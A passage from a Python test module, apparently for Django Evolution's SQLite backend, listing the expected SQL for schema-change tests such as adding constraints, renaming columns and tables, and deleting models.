'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
],
'DeleteColumnCustomTableModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_value" varchar(20) NOT NULL);',
'INSERT INTO "TEMP_TABLE" ("id", "alt_value")'
' SELECT "id", "alt_value"'
' FROM "custom_table_name";',
'DROP TABLE "custom_table_name";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "custom_table_name";',
],
}
def change_field(connection):
"""SQL test statements for the ChangeFieldTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
generate_index_name = make_generate_index_name(connection)
mappings = {
'SetNotNullChangeModelWithConstant': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(20) NOT NULL,'
' "char_field1" varchar(25) NOT NULL,'
' "char_field2" varchar(30) NOT NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' coalesce("char_field1", \'abc\\\'s xyz\'), "char_field2",'
' "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
],
'SetNotNullChangeModelWithCallable': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(20) NOT NULL,'
' "char_field1" varchar(25) NOT NULL,'
' "char_field2" varchar(30) NOT NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
],
'SetNullChangeModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(20) NOT NULL,'
' "char_field1" varchar(25) NULL,'
' "char_field2" varchar(30) NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
],
'NoOpChangeModel': [],
'IncreasingMaxLengthChangeModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(45) NOT NULL,'
' "char_field1" varchar(25) NULL,'
' "char_field2" varchar(30) NOT NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
],
'DecreasingMaxLengthChangeModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(1) NOT NULL,'
' "char_field1" varchar(25) NULL,'
' "char_field2" varchar(30) NOT NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
],
'M2MNullChangeModel': [],
'M2MDBTableChangeModel': [
'ALTER TABLE "change_field_non-default_m2m_table"'
' RENAME TO "custom_m2m_db_table_name";',
],
'AddDBIndexChangeModel': [
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field2");'
% generate_index_name('tests_testmodel', 'int_field2'),
],
'AddDBIndexNoOpChangeModel': [],
'RemoveDBIndexChangeModel': [
'DROP INDEX "%s";'
% generate_index_name('tests_testmodel', 'int_field1')
],
'RemoveDBIndexNoOpChangeModel': [],
'AddUniqueChangeModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL UNIQUE,'
' "char_field" varchar(20) NOT NULL,'
' "char_field1" varchar(25) NULL,'
' "char_field2" varchar(30) NOT NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
],
'RemoveUniqueChangeModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(20) NOT NULL,'
' "char_field1" varchar(25) NULL,'
' "char_field2" varchar(30) NOT NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
],
'MultiAttrSingleFieldChangeModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(20) NOT NULL,'
' "char_field1" varchar(25) NULL,'
' "char_field2" varchar(35) NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
],
'decimal_field_decimal_places': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(20) NOT NULL,'
' "char_field1" varchar(25) NULL,'
' "char_field2" varchar(30) NOT NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
],
'decimal_field_decimal_places_max_digits': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(20) NOT NULL,'
' "char_field1" varchar(25) NULL,'
' "char_field2" varchar(30) NOT NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
],
'decimal_field_max_digits': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(20) NOT NULL,'
' "char_field1" varchar(25) NULL,'
' "char_field2" varchar(30) NOT NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
],
}
if sqlite_version >= (3, 26):
mappings.update({
'DBColumnChangeModel': [
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "custom_db_column" TO "customised_db_column";',
],
'MultiAttrChangeModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(35) NOT NULL,'
' "char_field1" varchar(25) NULL,'
' "char_field2" varchar(30) NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "custom_db_column" TO "custom_db_column2";',
],
'RedundantAttrsChangeModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(35) NOT NULL,'
' "char_field1" varchar(25) NULL,'
' "char_field2" varchar(30) NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "custom_db_column" TO "custom_db_column3";',
],
})
else:
mappings.update({
'DBColumnChangeModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "customised_db_column" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(20) NOT NULL,'
' "char_field1" varchar(25) NULL,'
' "char_field2" varchar(30) NOT NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "customised_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
],
'MultiAttrChangeModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column2" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(35) NOT NULL,'
' "char_field1" varchar(25) NULL,'
' "char_field2" varchar(30) NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column2", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
],
'RedundantAttrsChangeModel': [
'CREATE TABLE "TEMP_TABLE" '
'("my_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "alt_pk" integer NOT NULL,'
' "custom_db_column3" integer NOT NULL,'
' "int_field1" integer NOT NULL,'
' "int_field2" integer NOT NULL,'
' "int_field3" integer NOT NULL UNIQUE,'
' "int_field4" integer NOT NULL,'
' "char_field" varchar(35) NOT NULL,'
' "char_field1" varchar(25) NULL,'
' "char_field2" varchar(30) NULL,'
' "dec_field" decimal NOT NULL,'
' "dec_field1" decimal NULL,'
' "dec_field2" decimal NOT NULL);',
'INSERT INTO "TEMP_TABLE"'
' ("my_id", "alt_pk", "custom_db_column3", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2")'
' SELECT "my_id", "alt_pk", "custom_db_column", "int_field1",'
' "int_field2", "int_field3", "int_field4", "char_field",'
' "char_field1", "char_field2", "dec_field", "dec_field1",'
' "dec_field2"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel" ("int_field1");'
% generate_index_name('tests_testmodel', 'int_field1'),
],
})
return mappings
def delete_model(connection):
"""SQL test statements for the DeleteModelTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
return {
'BasicModel': [
'DROP TABLE "tests_basicmodel";',
],
'BasicWithM2MModel': [
'DROP TABLE "tests_basicwithm2mmodel_m2m";',
'DROP TABLE "tests_basicwithm2mmodel";',
],
'CustomTableModel': [
'DROP TABLE "custom_table_name";',
],
'CustomTableWithM2MModel': [
'DROP TABLE "another_custom_table_name_m2m";',
'DROP TABLE "another_custom_table_name";',
],
}
def rename_model(connection):
"""SQL test statements for the RenameModelTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
return {
'RenameModel': [
'ALTER TABLE "tests_testmodel" RENAME TO "tests_destmodel";',
],
'RenameModelSameTable': [],
'RenameModelForeignKeys': [
'ALTER TABLE "tests_testmodel" RENAME TO "tests_destmodel";',
],
'RenameModelForeignKeysSameTable': [],
'RenameModelManyToManyField': [
'ALTER TABLE "tests_testmodel" RENAME TO "tests_destmodel";',
],
'RenameModelManyToManyFieldSameTable': [],
}
def delete_application(connection):
"""SQL test statements for the DeleteAppTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
return {
'DeleteApplication': [
'DROP TABLE "tests_testmodel_anchor_m2m";',
'DROP TABLE "tests_testmodel";',
'DROP TABLE "tests_appdeleteanchor1";',
'DROP TABLE "app_delete_custom_add_anchor_table";',
'DROP TABLE "app_delete_custom_table_name";',
],
'DeleteApplicationWithoutDatabase': [],
}
def rename_field(connection):
"""SQL test statements for the RenameFieldTests suite.
Args:
connection (django.db.backends.base.BaseDatabaseWrapper):
The connection being tested.
Returns:
dict:
The dictionary of SQL mappings.
"""
generate_index_name = make_generate_index_name(connection)
mappings = {
'RenameManyToManyTableModel': (
'ALTER TABLE "tests_testmodel_m2m_field"'
' RENAME TO "tests_testmodel_renamed_field";'
),
'RenameManyToManyTableWithColumnNameModel': (
'ALTER TABLE "tests_testmodel_m2m_field"'
' RENAME TO "tests_testmodel_renamed_field";'
),
'RenameNonDefaultManyToManyTableModel': (
'ALTER TABLE "non-default_db_table"'
' RENAME TO "tests_testmodel_renamed_field";'
),
}
if sqlite_version >= (3, 26):
mappings.update({
'RenameColumnModel': (
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "int_field" TO "renamed_field";'
),
'RenameColumnWithTableNameModel': (
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "int_field" TO "renamed_field";'
),
'RenamePrimaryKeyColumnModel': (
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "id" TO "my_pk_id";'
),
'RenameForeignKeyColumnModel': (
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "custom_db_col_name" TO "renamed_field";'
),
'RenameNonDefaultColumnNameModel': (
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "custom_db_col_name" TO "renamed_field";'
),
'RenameNonDefaultColumnNameToNonDefaultNameModel': (
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "custom_db_col_name"'
' TO "non-default_column_name";'
),
'RenameNonDefaultColumnNameToNonDefaultNameAndTableModel': (
'ALTER TABLE "tests_testmodel"'
' RENAME COLUMN "custom_db_col_name"'
' TO "non-default_column_name2";'
),
'RenameColumnCustomTableModel': (
'ALTER TABLE "custom_rename_table_name"'
' RENAME COLUMN "value" TO "renamed_field";'
),
})
else:
if django_version >= (1, 7):
# On Django 1.7 and higher, M2M intermediary tables set
# references on the field pointing back to the owning model. This
# triggers our special logic on SQLite <= 3.25 that performs a
# schema rewrite in order to update those references to point to
# the new table name.
mappings['RenamePrimaryKeyColumnModel'] = [
'CREATE TABLE "TEMP_TABLE" '
'("my_pk_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "custom_db_col_name" integer NOT NULL,'
' "custom_db_col_name_indexed" integer NOT NULL,'
' "fk_field_id" integer NOT NULL'
' REFERENCES "tests_renameanchor1" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'INSERT INTO "TEMP_TABLE"'
' ("my_pk_id", "char_field", "int_field",'
' "custom_db_col_name", "custom_db_col_name_indexed",'
' "fk_field_id")'
' SELECT "id", "char_field", "int_field",'
' "custom_db_col_name", "custom_db_col_name_indexed",'
' "fk_field_id"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel"'
' ("custom_db_col_name_indexed");'
% generate_index_name('tests_testmodel',
'custom_db_col_name_indexed',
'int_field_named_indexed'),
'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field_id");'
% generate_index_name('tests_testmodel', 'fk_field_id',
'fk_field'),
'-- Start of a new transaction:',
'PRAGMA writable_schema = 1;',
'UPDATE sqlite_master SET sql = replace(sql,'
' \' REFERENCES "tests_testmodel" ("id") \','
' \' REFERENCES "tests_testmodel" ("my_pk_id") \');',
re.compile(r'PRAGMA schema_version = \d+;'),
'PRAGMA writable_schema = 0;',
'PRAGMA integrity_check;',
'-- Run outside of a transaction:',
'VACUUM;',
]
else:
# Django 1.6 and earlier don't generate those references on the
# M2M intermediary table, so we don't need to worry about the
# schema rewrite.
mappings['RenamePrimaryKeyColumnModel'] = [
'CREATE TABLE "TEMP_TABLE" '
'("my_pk_id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "int_field" integer NOT NULL,'
' "custom_db_col_name" integer NOT NULL,'
' "custom_db_col_name_indexed" integer NOT NULL,'
' "fk_field_id" integer NOT NULL'
' REFERENCES "tests_renameanchor1" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'INSERT INTO "TEMP_TABLE"'
' ("my_pk_id", "char_field", "int_field",'
' "custom_db_col_name", "custom_db_col_name_indexed",'
' "fk_field_id")'
' SELECT "id", "char_field", "int_field",'
' "custom_db_col_name", "custom_db_col_name_indexed",'
' "fk_field_id"'
' FROM "tests_testmodel";',
'DROP TABLE "tests_testmodel";',
'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
'CREATE INDEX "%s" ON "tests_testmodel"'
' ("custom_db_col_name_indexed");'
% generate_index_name('tests_testmodel',
'custom_db_col_name_indexed',
'int_field_named_indexed'),
'CREATE INDEX "%s" ON "tests_testmodel" ("fk_field_id");'
% generate_index_name('tests_testmodel', 'fk_field_id',
'fk_field'),
]
mappings.update({
'RenameColumnModel': [
'CREATE TABLE "TEMP_TABLE" '
'("id" integer NOT NULL UNIQUE PRIMARY KEY,'
' "char_field" varchar(20) NOT NULL,'
' "renamed_field" integer NOT NULL,'
' "custom_db_col_name" integer NOT NULL,'
' "custom_db_col_name_indexed" integer NOT NULL,'
' "fk_field_id" integer NOT NULL'
' REFERENCES "tests_renameanchor1" ("id")'
' DEFERRABLE INITIALLY DEFERRED);',
'INSERT INTO "TEMP_TABLE"'
' ("id", "char_field", "renamed_field", "custom_db_col_name",'
' "custom_db_col_name_indexed", "fk_field_id")'
' SELECT "id", "char_field", "int_field",'
' "custom_db_col_name", "custom_db_col_name_indexed",'
' "fk_field_id"'
